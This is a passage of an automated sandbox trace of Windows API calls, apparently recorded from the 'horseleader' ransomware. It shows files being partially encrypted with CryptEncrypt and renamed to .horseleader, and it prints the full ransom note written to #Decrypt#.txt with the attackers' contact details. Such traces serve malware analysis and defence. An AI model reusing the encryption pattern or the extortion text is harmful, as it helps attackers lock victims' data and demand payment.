hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x245e, lpOverlapped=0x0) returned 1 [0252.130] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffdba2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.130] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x245e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x245e, lpOverlapped=0x0) returned 1 [0252.130] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.130] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.130] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.130] CloseHandle (hObject=0x1a4) returned 1 [0252.130] GetProcessHeap () returned 0x780000 [0252.130] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.130] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.horseleader") returned 94 [0252.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.horseleader")) returned 1 [0252.132] GetProcessHeap () returned 0x780000 [0252.132] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.132] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x745e, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="Sybase.xsl", cAlternateFileName="")) returned 0 [0252.132] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0252.132] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\#Decrypt#.txt") returned 85 [0252.132] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\#Decrypt#.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.132] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.132] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0252.134] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.134] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0252.134] CloseHandle (hObject=0x158) returned 1 [0252.134] GetProcessHeap () returned 0x780000 [0252.134] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.134] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3cf6c00, ftCreationTime.dwHighDateTime=0x1ca2caa, ftLastAccessTime.dwLowDateTime=0x5f005150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3cf6c00, ftLastWriteTime.dwHighDateTime=0x1ca2caa, nFileSizeHigh=0x0, nFileSizeLow=0x2a65d68, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="msmdlocal.dll", cAlternateFileName="MSMDLO~1.DLL")) returned 1 [0252.134] lstrcmpiW (lpString1="msmdlocal.dll", lpString2="Windows") returned -1 [0252.134] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned 74 [0252.134] StrStrIW (lpFirst="msmdlocal.dll", lpSrch=".horseleader") returned 0x0 [0252.134] lstrcmpW (lpString1="msmdlocal.dll", lpString2="#Decrypt#.txt") returned 1 [0252.134] lstrcmpW (lpString1="msmdlocal.dll", lpString2="_uninstalling_.png") returned 1 [0252.134] lstrlenW (lpString=".testttjffg") returned 11 [0252.134] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll", lpSrch=".testttjffg") returned 0x0 [0252.134] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.134] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.135] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned 74 [0252.135] StrStrW (lpFirst="msmdlocal.dll", lpSrch=".txt") returned 0x0 [0252.135] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=44457320) returned 1 [0252.135] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.135] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.139] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.140] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x15306b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.140] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.143] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2a60d68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.143] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.146] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.146] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.146] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.146] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.147] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.147] CloseHandle (hObject=0x158) returned 1 [0252.147] GetProcessHeap () returned 0x780000 [0252.147] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.147] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.horseleader") returned 86 [0252.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.horseleader")) returned 1 [0252.148] GetProcessHeap () returned 0x780000 [0252.148] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.148] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fe200, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47fe200, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0xbc4568, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="msmgdsrv.dll", cAlternateFileName="")) returned 1 [0252.148] lstrcmpiW (lpString1="msmgdsrv.dll", lpString2="Windows") returned -1 [0252.148] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll") returned 73 [0252.148] StrStrIW (lpFirst="msmgdsrv.dll", lpSrch=".horseleader") returned 0x0 [0252.149] lstrcmpW (lpString1="msmgdsrv.dll", lpString2="#Decrypt#.txt") returned 1 [0252.149] lstrcmpW (lpString1="msmgdsrv.dll", lpString2="_uninstalling_.png") returned 1 [0252.149] lstrlenW (lpString=".testttjffg") returned 11 [0252.149] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll", lpSrch=".testttjffg") returned 0x0 [0252.149] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.149] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.149] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.149] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll") returned 73 [0252.150] StrStrW (lpFirst="msmgdsrv.dll", lpSrch=".txt") returned 0x0 [0252.150] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12338536) returned 1 [0252.150] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.150] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.152] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.153] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.154] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x5dfab4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.154] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.157] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.157] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.158] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xbbf568, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.158] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.161] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.162] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.162] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.162] CloseHandle (hObject=0x158) returned 1 [0252.162] GetProcessHeap () returned 0x780000 [0252.162] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.162] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.horseleader") returned 85 [0252.162] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll.horseleader")) returned 1 [0252.163] GetProcessHeap () returned 0x780000 [0252.163] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.164] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b10f00, ftCreationTime.dwHighDateTime=0x1ca2cab, ftLastAccessTime.dwLowDateTime=0x5f28c8b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b10f00, ftLastWriteTime.dwHighDateTime=0x1ca2cab, nFileSizeHigh=0x0, nFileSizeLow=0x7c6f68, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="msolap100.dll", cAlternateFileName="MSOLAP~1.DLL")) returned 1 [0252.164] lstrcmpiW (lpString1="msolap100.dll", lpString2="Windows") returned -1 [0252.164] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll") returned 74 [0252.164] StrStrIW (lpFirst="msolap100.dll", lpSrch=".horseleader") returned 0x0 [0252.164] lstrcmpW (lpString1="msolap100.dll", lpString2="#Decrypt#.txt") returned 1 [0252.164] lstrcmpW (lpString1="msolap100.dll", lpString2="_uninstalling_.png") returned 1 [0252.164] lstrlenW (lpString=".testttjffg") returned 11 [0252.164] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll", lpSrch=".testttjffg") returned 0x0 [0252.164] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.164] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.164] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.165] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll") returned 74 [0252.165] StrStrW (lpFirst="msolap100.dll", lpSrch=".txt") returned 0x0 [0252.165] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8154984) returned 1 [0252.165] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.165] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.173] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.173] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.175] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3e0fb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.175] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.177] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.177] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.178] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x7c1f68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.178] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.180] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, 